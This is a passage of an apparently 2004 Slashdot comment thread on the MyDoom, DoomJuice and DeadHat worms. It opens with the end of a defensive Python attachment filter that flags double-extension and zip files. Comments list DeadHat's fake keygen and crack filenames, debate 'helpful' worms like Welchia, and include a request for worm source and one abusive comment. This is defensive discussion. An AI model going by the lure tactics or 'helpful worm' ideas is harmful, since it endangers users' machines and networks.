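    attachments = [
        ("report.pdf", inert),
        ("document.txt.pif", inert),
        ("notes.zip", archive.getvalue()),
    ]
    for filename, data in attachments:
        msg.add_attachment(data, maintype="application",
                           subtype="octet-stream", filename=filename)
    return msg.as_bytes()


if __name__ == "__main__":
    sample = build_sample()
    for mode in (True, False):
        print("block_all_zip =", mode)
        for filename, reason in blocked_attachments(sample, block_all_zip=mode):
            print("  reject %r: %s" % (filename, reason))
```

Matching on the last extension only is what defeats double-extension names; the strict mode trades some legitimate mail for not having to trust the archive parser.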
    8. Re:For Newbies, not experienced users. by Nurseman · · Score: 1
      " I pretty much agree, at this point, I stop all executables, and .zip files at my mail server.. kind of a pain, but between that, and the 25 RBLs I have setup, I only get about 10-15 unwanted emails a day... *sigh* ... I won't run windows in front of a firewall now, even if pseudo-secure (only known ports available) .. too much of a pain."

      I think this goes to the point, you are obviously a well informed, savvy computer user. You are not the problem. People who click on the link "to see what this does" are the problem. My friend who has a Masters in Finance and works for a VERY large firm, won't let me email him at work "because I only use it for work" Yet at home he has broadband, direct to his XP box, always on, and he has every piece of crapware, malware, and such installed. (He does run Norton AV, and I send him reminders to update the definitions when I read of particularly bad virii) He just can't see the danger of Bonzi Buddy and other "helpers" installed on his machine. These are the people who we need to educate.

      --
      Save a Life. Donate Blood. Please.
    9. Re:For Newbies, not experienced users. by aztracker1 · · Score: 1

      "I think this goes to the point, you are obviously a well informed, savvy computer user. You are not the problem. People who click on the link 'to see what this does' are the problem. My friend who has a Masters in Finance and works for a VERY large firm, won't let me email him at work 'because I only use it for work' Yet at home he has broadband, direct to his XP box, always on, and he has every piece of crapware, malware, and such installed. (He does run Norton AV, and I send him reminders to update the definitions when I read of particularly bad virii) He just can't see the danger of Bonzi Buddy and other "helpers" installed on his machine. These are the people who we need to educate."

      Yeah, I'm pretty good about it.. I usually don't open attachments.. although, I almost got duped by one of the "Paypal" scams, that have the %01's in the url.. my way bad.. noticed it after clicking the link.. and I use thunderbird for mail.

      I think in this instance it is more a point of human nature.. only way around that is to prompt for a password every time anyone wants to run anything... which simply won't work.. the solution is to work on human nature... although there are flaws in any os, or packages with an os, which only time can say, the sheer number of people running various windows versions makes it an easier target...

      --
      Michael J. Ryan - tracker1.info
  44. Re:Cyber war? Puleeeze by saskboy · · Score: 4, Informative

    But nothing is new with MyDoom. Maybe the intent, but there are still dozens of active viruses out there with back door capabilities that could be exploited by crime, or by spammers [which are criminals I suppose].

    Why commit computer crimes from your own machines, when you can do it from another person's, and in fact connect to a 2nd or 3rd infected machine from the first infected machine to add another layer of difficulty to any investigation?

    The ability to harvest contact information exists in a simple forwarded joke email. This is not advanced "war" stuff. If it was advanced, people wouldn't have noticed.

    --
    Saskboy's blog is good. 9 out of 10 dentists agree.
  45. ThunderCat's taken by Anonymous Coward · · Score: 0

    That's the next name for Mozilla's standalone email client. Formerly known as Thunderbird.

    1. Re:ThunderCat's taken by Anonymous Coward · · Score: 0

      I'm still waiting for FireMonkey.

  46. Exchange servers beware by t0qer · · Score: 4, Interesting

    This could have happened to anyone I guess....

    Last week I get a call from another tech friend, "Hey toqer, I got this customer and they got infected with MyDoom. The NAV wasn't set to exclude the exchange store on the server, and it wiped out their calendaring info, the server needs all its logs rebuilt"

    I asked him for more info. Logs rebuilt? WTF was he talking about? Apparently they had brought in an "Exchange Expert" to fix the problem. The guy spent about 2 days out there and didn't get anything done. After calling them I went out to see exactly what the problem was.

    This office is a lawyers' office, and their specialty is wills and trust funds. I was met by a really nice french woman at the door. "Toqer, please follow me and I will show you what the problem was"

    She first showed me their main problem. Whenever they would try and modify the big boss's calendar, outlook would spit out some nonsense about unable to connect to his free/busy information. Second problem I noticed was the entire network was running on NT4.0, and the machines were all pentium1 class PC's. "Good thing this is hourly" I said to myself.

    Looking at the NAV logs, it looked like it had deleted some files from d:\exchngsrv\mtadata (not exactly, this is best recollection) First thing I did was set NAV to exclude those folders. Good, done.. Now it was time to fix the problem itself.

    Now I don't have the exact KB article, but the MS solution was to log in as the affected user. Backup his exchange store to personal folders. Use the exchng32 client to delete the calendar folder, then launch outlook with a /resetfolders switch, and finally re-upload his calendar from the PST. After doing it it worked and they were happy.

    It took me 4 hours to fix it, nice little chunk o change in my pocket. Thanks MyDoom!

    1. Re:Exchange servers beware by JaredOfEuropa · · Score: 1
      Apparently they had brought in an "Exchange Expert" to fix the problem. The guy spent about 2 days out there and didn't get anything done.
      ...
      It took me 4 hours to fix it, nice little chunk o change in my pocket. Thanks MyDoom!
      Sounds like the Exchange expert was the smarter person... he gets to bill for 2 days of work! Plus, he didn't fix it so he was probably looking at some more work... until you ruined that for him! ;-)
      --
      If construction was anything like programming, an incorrectly fitted lock would bring down the entire building...
  47. Cleverer Social Engineering by GillBates0 · · Score: 5, Informative
    According to the Symantec Security Response page, the DeadHat (parody of RedHat?) worm spreads through Soulseek disguised as one of the following:

    * Windows2003Keygen.exe
    * mIRC.v6.12.Keygen.exe
    * Norton.All.Products.KeyMkr.exe
    * F-Secure.Antivirus.Keymkr.exe
    * FlashFXP.v2.1.FINAL.Crack.exe
    * SecureCRTPatch.exe
    * TweakXPProKeyGenerator.exe
    * FRUITYLOOPS.SPYWIRE.FIX.EXE
    * ALL.SERIALS.COLLECTION.2003-2004.EXE
    * WinRescue.XP.v1.08.14.exe
    * GoldenHawk.CDRWin.v3.9E.Incl.Keygen.exe
    * BlindWrite.Suite.v4.5.2.Serial.Generator.exe
    * Serv-U.allversions.keymaker.exe
    * WinZip.exe
    * WinRar.exe
    * WinAmp5.Crack.exe

    This is also a Social Engineering technique similar to the catchy email sent by other recent worms.

    The difference I see is that the filenames are catchier and seem to be targeted towards a more computer savvy audience. Normal Windows users wouldn't need to look for WinRar.exe and the other security software cracks/etc...but then, they're the ones who opened the MyDoom attachments in the first place.

    Get the dumb users with vulnerable PCs through email attachments, and break the more secure computers/users through enticing downloads!

    --
    An Indian-American Hindu committed to non-violent thought/speech/action alarmed by the global explosion of radical Islam
    1. Re:Cleverer Social Engineering by Elwood+P+Dowd · · Score: 1

      It's worse when the download actually works. Then they've no reason to be suspicious.

      --

      There are no trails. There are no trees out here.
    2. Re:Cleverer Social Engineering by hetairoi · · Score: 1

      just like users opening random email attachments, anyone running .exe's (on a windows machine ok, don't tell me you don't have to because you run linux, so do I) from soulseek/kazaa/edonkey/whatever that doesn't scan the file with some type of virus scanner first needs a minimum of 10 whacks with a Clue-by-Four

      --
      you're all figments of my deranged imagination
    3. Re:Cleverer Social Engineering by triclipse · · Score: 2, Informative

      Actually, there are more like 10 - 100 trillion cells in the human body :)

      --
      No Inflation Taxation without Representation
  48. I think you mean that... by Anonymous Coward · · Score: 1, Funny

    ... the editors don't proveread.

  49. New Welchia Worm by fdiskne1 · · Score: 5, Interesting

    Whereas the new Welchia/Nachi worm cleans the MyDoom viruses, sets the hosts file back to just 127.0.0.1 localhost, installs a few Microsoft patches, reboots and scans for other MyDoom, MSBlast and Welchia infected machines to clean. It also sets up a web server on the machine serving a webpage with a cryptic message about various Japanese and Korean massacres. It then disables itself on June 1, 2004, or after running 180 days, whichever comes first.

    I don't normally like any Windows virus, but I have a tough time not liking this one.

    --
    But why is the rum gone?
    1. Re:New Welchia Worm by stratjakt · · Score: 0, Troll

      Because you're a clueless slashbot.

      Welchia had a much higher cost in terms of sucking away bandwidth. It brought down more networks than the original worms did.

      --
      I don't need no instructions to know how to rock!!!!
    2. Re:New Welchia Worm by genmanath · · Score: 2, Interesting

      It's true that the worm you describe is a relatively polite worm, but it's still a worm. A gang of burglars which decides to stop breaking and entering in a certain neighborhood after a certain date is still a gang of burglars breaking, entering, and making off with other people's things.

      I was employed as a support tech when the MSBlast/Welchia infections started in earnest. I spent a lot of time that could have been used much more productively cleaning it off machines all over the campus. As a once and future support tech, my tolerance for such is slim, and even slimmer when the worm is written to be 'helpful', given that Nachi was more of a problem than Blaster.

      --
      G. M. Manath

      Go not to the Elves for counsel, for they will say both 'Yes' and 'No.'

    3. Re:New Welchia Worm by ericandrade · · Score: 1

      It doesn't mean that this "white" virus doesn't cause damage.

      When the original Welchia worm came out, it crashed most of Air Canada's computer system, leaving many passengers stranded, and lots of employees trying to remember the pencil and paper way of booking a flight.

  50. open mouth, insert foot by Anonymous Coward · · Score: 0

    Grammer check anybody?

    spelling check, anybody?

  51. Hmmm.... by fizban · · Score: 5, Funny

    MyDoom: "Who are you?"

    DoomJuice: "I'm your Grim Reaper."

    MyDoom: "Like hell you are. This is my machine, punk."

    DoomJuice: "Prepare to meet thy maker (wink wink)."

    MyDoom: "Over my dead process."

    DoomJuice: "Look, a little old lady on a Windows 98 machine!"

    MyDoom: (turns) "Who? Where?"

    DoomJuice: "Your Mom." *BONK* "Muhahahaha! Mine, the world is mine!"

    --

    +1 Insightful, -1 Troll. What can I say, I'm an Insightful Troll.

    1. Re:Hmmm.... by Anonymous Coward · · Score: 0

      +1 Insightful, -1 Troll. What can I say, I'm an Insightful Troll.

      Yeah, Slashdot accounts should have an alignment, like in AD&D.

      I think I'd be an Underrated Troll

  52. "threat these two worms pose shouldn't be to big" by jdunlevy · · Score: 3, Interesting
    Whilst the threat these two worms pose shouldn't be to big, both needing a MyDoom backdoor...

    Maybe not a big threat in the sense that most of us reading this have been taking precautions against viruses like MyDoom all along (or were on Macs or Linux), but there's still a pretty big secondary threat to all of us who use the internet. I'm still seeing a lot of MyDoom-infected computers out there (a quick look at my mail server shows examples -- sometimes multiple examples -- of MyDoom sent from dsl hosts in cerfnet.com, telus.net, sprintbbd.net, and ameritech.net just within the last hour). When Doomjuice and Deadhat get on these machines and start sucking up neighboring bandwidth with their DoS or whatever, it's a problem -- even if it's not actually your machine that's infected.

  53. debian is vulnerable too! by Anonymous Coward · · Score: 0

    make sure you keep your debian boxes behind gentoo firewalls guys!

  54. Debilian by Anonymous Coward · · Score: 0

    is the new release, the worst possible distro wanna-be, total crap

  55. Re:Cyber war? Puleeeze by LostCluster · · Score: 1

    The difference between killing as street murder and killing as an act of war lies simply in the volume and intent. We're crossing the line into war because MyDoom is a much bigger problem than any obscure exploit.

  56. For Newbies, not experienced users??? by Saeed+al-Sahaf · · Score: 1
    These people STILL infected with MyDoom don't know the first thing about computer security.

    You make some excellent points. And, *why* should the average person *be* an expert on computer security? Why *WHY* should average users need to hassle with patching their box every *fucking* week? I've resisted the Mac for years (price has kept me away), and now have several Linux boxes in addition to my Win boxes, but...

    It's obvious that windows is NOT the perfect OS for clueless newbie users

    Linux just isn't there yet for those who cannot or do not want to deal with security issues and such. There is a big trade off in ease of use for the *average* user. Lack of software and difficulty installing software is still a big issue. Sorry, Apt-Get and RPMs still don't cut it with the *average* user.

    --
    "Who are in control, they are not in control of anything - they don't even control themselves!" - Glen Beck
    1. Re:For Newbies, not experienced users??? by Anonymous Coward · · Score: 0

      *why* should the average person *be* an expert on computer security?

      They don't need to be an "expert". You don't need to be an 'expert mechanic' to know something is wrong with your car when it won't start.

      Why *WHY* should average users need to hassle with patching their box every *fucking* week?

      Why *WHY* should average drivers need to hassle with gassing their car every *fucking* week?
      And changing the oil every *fucking* year?

  57. *yawns* by Anonymous Coward · · Score: 0

    see subject

  58. Grammar monitor here... by mikehunt · · Score: 1

    So quoth he: "the threat these two worms pose shouldn't be to big,"

    Hey Mr. Taco! Maybe you should proofread your submissions.

    At least you got shouldn't right!

  59. DebilianNet by Anonymous Coward · · Score: 0

    as long as u don't use that piece of crap Debian you're juust fiine

  60. Re:Get a PENCIL AND PAPER by Professr3 · · Score: 2, Funny

    Etch-A-Sketch... "You shake it to reboot" - Dilbert

  61. Kinda scary by promethean_spark · · Score: 4, Insightful

    That a worm that digs for personal information goes active right when people start doing their taxes in the US. There are a lot of bank account numbers being typed in right now. A worm that hacks taxact to send an account number the virus writer can access instead of the user's would be quite profitable. It'd probably only work for 24 hours or less, but it could steal hundreds of millions in that time.

  62. Deadhat, but what's next? Mandrunk (Mandrake)... by TheTranceFan · · Score: 1
    • KnoppAxe (Knoppix)
    • Debunk (Debian)
    • Genital (Gentoo)
    • Sux3 (SUSE)
    • Hackware (Slackware)
    • PCSCOOS (PCLinuxOS)
    • Fedup (Fedora)
    • DamnSCO (Damn Small)
    ...and that's just the first 10 distros listed on DistroWatch.

    If these guys name a variant after every Linux distro, we're all in big trouble!

  63. Avoidable by JRSiebz · · Score: 1, Interesting

    IF everyone would have updated their systems with the patch in july 2003 (before the MyDoom virus and its variants came out), no one would have ever gotten any of them. And the news media would have nothing to talk about.

    1. Re:Avoidable by SirTalon42 · · Score: 1

      Patch? MyDoom didn't use any exploit (except OPEN THE ATTACHMENT FOR FREE PORN! (actually fake sys admin crap)). What patch are you talking about?

    2. Re:Avoidable by JRSiebz · · Score: 1

      oops, i meant blaster since i never get any of them ;-) i get em all confused :-)

  64. Re:Grammar monitor here...and surprised! by mikehunt · · Score: 1

    Wow, just as I finish reading another thread...I click 'refresh' and behold: too !!!

  65. Did I miss something? by metroid+composite · · Score: 1

    The article you're linking to is about MyDoom.C. This article is about DoomJuice and DeadHat, which are a considerably more interesting development than the Umpteenth version of the same virus (and, heck MyDoom will probably reach Z too...given enough time).

  66. euhm dutch newspaper? by 1nhuman · · Score: 1

    I'm Dutch but never heard of this regional newspaper. Besides, the region its printed version is published in is rather euh.. backward (I'm generalising, I know). I also tried to subscribe to the online version but there's an error in the subscribe form. Well at least with Mozilla on a Powerbook.

    --
    The glass is half-full. With poison. And there are cracks in the glass. The dirty, dirty glass.
  67. I smell bullshit by El · · Score: 1

    According to mi2g, deadhat has encrypted intelligence, waiting to be activated.

    Either a) the code to decrypt it is in the virus itself, making decrypting the "intelligence" trivial, or b) other code is required, in which case, why not just use the back door to install the "intelligence" rather than distributing it beforehand? I suspect what they're calling "encrypted intelligence" is really something most of us would call "random bits" just thrown in to confuse people.

    --

    "Freedom means freedom for everybody" -- Dick Cheney

  68. Viruses : Cutting Edge of Artificial Intelligence by Pup5 · · Score: 5, Interesting
    It's interesting to watch the development of more advanced viruses. We've created the perfect medium for their development, existence within an artificial world.
    • Food is computing power, which it steals.
    • Prey are vulnerable computers, with computing power unprotected.
    • Predators are virus scanning and eradication software.
    • Reproduction is checked only by environmental factors.
    • Evolution has developed two clear attributes: transport and payload.
    It will be very interesting to watch this area develop, especially considering its place in society. It's incredible that not only have software companies been given virtual total immunity from the financial impact of their defective products, but that they have convinced the right parties that people who expose their defects are criminals. Truly incredible.
  69. Re:"threat these two worms pose shouldn't be to bi by SirTalon42 · · Score: 1

    Huh, I seem to get mostly hit by AOL accounts, I didn't realize it was MyDoom till I read an article that said the port number... Good old FireStarter

  70. Theory vs. practice by Vexinator · · Score: 1

    I believe the big worm from last year which you are referring to was MSBlaster, and the modified worm that was written to patch/remove it was Welchia.

    Now I'm not condoning the use of a worm to remove another worm, but the real problem of Welchia is that it was poorly thought out. It brought down entire networks with its ICMP traffic and attempts to download the DCOM RPC patch from Microsoft.

    In theory, a well written worm could remove an existing infection and patch the affected computer, with a minimal and transient impact on the computer in question.

    In practice, the removal worm is prone to crappy design (most likely due to a rushed timeline) and ends up being yet another problem.

    --
    "Be afraid to die until you have won some victory for humanity" -Horace Mann
  71. Re:Organized crime? by Anonymous Coward · · Score: 0
    Would you take a second of your time to help wipe out stupidity?

    If so, fucking shoot yourself in the head.

  72. Re:Organized crime? by mdielmann · · Score: 1

    Do you prefer scented or hot oil?

    --
    Sure I'm paranoid, but am I paranoid enough?
  73. Parasites by BranchingLichen · · Score: 2, Funny

    So, naturalists observe, a flea
    Hath smaller fleas that on him prey;
    And these have smaller still to bite 'em;
    And so proceed ad infinitum.

    -- Jonathan Swift
  74. Re:Organized crime? by Anonymous Coward · · Score: 0

    > > When are the nation states going to wake up and start an international war against spam?

    >When the spammers have oil.

    Or when they have WMD ... uhh .. wait, never mind

  75. Similar to Hepatitis D vs B by henryhbk · · Score: 3, Interesting

    So this is similar to the real life virus Hepatitis D, which is slightly damaged and can't infect a host cell unless actively infected with hepatitis B. It has interesting implications for biology that one can look at the spread of dependent pathogens using computer models, by looking at the spread of these piggyback worms.

  76. Provinciale Zeeuwsche Courant by Pflipp · · Score: 1

    Who would ever have thought that the Provinciale Zeeuwsche Courant beat Slashdot at this news topic.

    --
    "We can confirm that Debian does *not* ship the version with the trojan horse. Our version predates it." [CA-2002-28]
  77. That's MY Domain! by TechyImmigrant · · Score: 3, Funny

    I have owned the deadhat.com domain for a few years now. It is a simple pun on RedHat and the site is of interest to a very limited group of people.

    I am not at all happy that someone has sullied the good name of my website with a worm.

    --
    Evil people are out to get you.
  78. Shouldn't that be in quotes? by interactive_civilian · · Score: 1
    DougWhite said*
    The "music" comes to you after you sell your soul to the RIAA?
    There...fixed that for you. :D
    --
    "Empathise with stupidity, and you're halfway to thinking like an idiot." - Iain M. Banks
  79. Switching OSs isn't the solution by Raptor-DP · · Score: 3, Insightful

    I've heard many people say 'well, if you'd switch to mac or linux you wouldn't have this problem.' If one person switches to another OS, they still have to deal with the crap that gets written for windows, because like it or not since the majority is windows, and if it's a virus that generates massive amounts of web traffic we all have to put up with it. We all have to deal with the slow downs and the downed servers, not that microsoft's website being down is that great of a loss. At least until you're a network admin and need information on something critical and can't get to their knowledge base. And if that weren't enough, there are other results of this. It makes the internet look unsafe, and a place that needs outside control. I personally would hate to see more laws and acts than we already have designed to make the internet more 'secure'. Acts set in place to regulate the internet itself, or even more frightening, acts set in place on software makers. Every single new virus that comes out, is a potential launching point for so called Trusted Computing. Because, like it or not, holding the software company responsible for its customers not updating their software is stupid. Not saying that Microsoft shouldn't be held responsible for their excuse for a decent OS, but it's not like they aren't at least making patches and fixes for the problems found... slowly, yes ... but at least they are released. And I, while not enjoying Microsoft's software, have to use Windows for certain things, and am glad they are finally taking care of the problems they have. But am completely pissed the hell off at their supposed Trusted Computing, an evil that must be stopped. On another note, has anyone noticed an increase in DNS downage? I've had a few people tell me about problems, that when eventually looked into, were because of downed DNS servers. Possibly a result of MyDoom and Co.?

  80. Anyone want to post/upload the source code? by Anonymous Coward · · Score: 0

    anyone actually got the source code and is willing to put it online?

  81. According to Microsoft it's Unix's fault... by WotanKhan · · Score: 1
    that these worms spread. No kidding, I was just at a TS2 seminar (4 hour sales pitch you sit through to get free software, I skipped out after two). The Microsoft rep had a PowerPoint slide talking about the latest wave of worms, and one of the bullet points said that it was a social engineering problem, not software security, because the recipient runs the attachment.

    But the bullet point that made me spit up my drink was: "Spread by Unix email servers".

  82. hmmm... by efextra · · Score: 1
    When the spammers have oil.
    ... does snake oil count?
  83. Just couple of thoughts... by fi-greenie · · Score: 1

    Interesting.

    We had a couple of infected computers which had MyDoom on them. After an extensive registry and file search I found information about the crackers, who were dumb enough to use rootkits with ASCII encoded configuration files. There was all the information for a serious bust there: where they could be found, their passwords and information which could be used to get their IP addresses (which I did) and so forth.

    These fellows were using the infamous xs4all.nl from the Netherlands, but the rest of the information indicated that the people behind the attack were from Poland, Czech and Russia. This wasn't really a surprise for me, because many of the so-called script kiddies are from these countries - at least, those who annoy people in Western Europe and Scandinavia.

    I wish they could do something useful with their cut&paste skills instead of making IRC bots and FTP servers. It just seems that these people are just bored and not necessarily ill-faithed.

  84. Effects on Business by halfacat · · Score: 1

    I work at a software/ISP company in sales and received an email from the MIS department yesterday stating that the reason I might not be getting emails from clients and others is because they have a machine infected with MyDoom. Is this correct, or are they just covering up for having a f--ked up mail system that is dropping emails?

    Now don't get me wrong, we have a really good MIS department, well I don't really know how good they are as this is my first software co., but things seem to run fairly well and they keep a pretty tight lid on everything. However, there was a slight rumor a few weeks ago that someone on the inside might have infected us. Just how damaging would this be on a company that provides somewhat critical aspects of the Internet (i.e. domain registrations)? How far does this virus go and what havoc does it cause?

  85. Troll, or just an idiot? by Anonymous Coward · · Score: 0

    A Linux default installation, without modifying services and patching, has many, many flaws.

    The # of Windows viruses circulating is absolutely due to the fact that the majority of users run MSW. If the majority ran *nix, then viruses would be coded to reflect this.
    Try using the sense your mama tried so hard to beat into you.

  86. x-celent by Arnok · · Score: 0

    Of course it is!

  87. note to metamods by bill_mcgonigle · · Score: 0, Troll

    the 'troll' on this one was part of a mod-bomb.

    --
    My God, it's Full of Source!
    OUTSIDE_IP=$(dig +short my.ip @outsideip.net)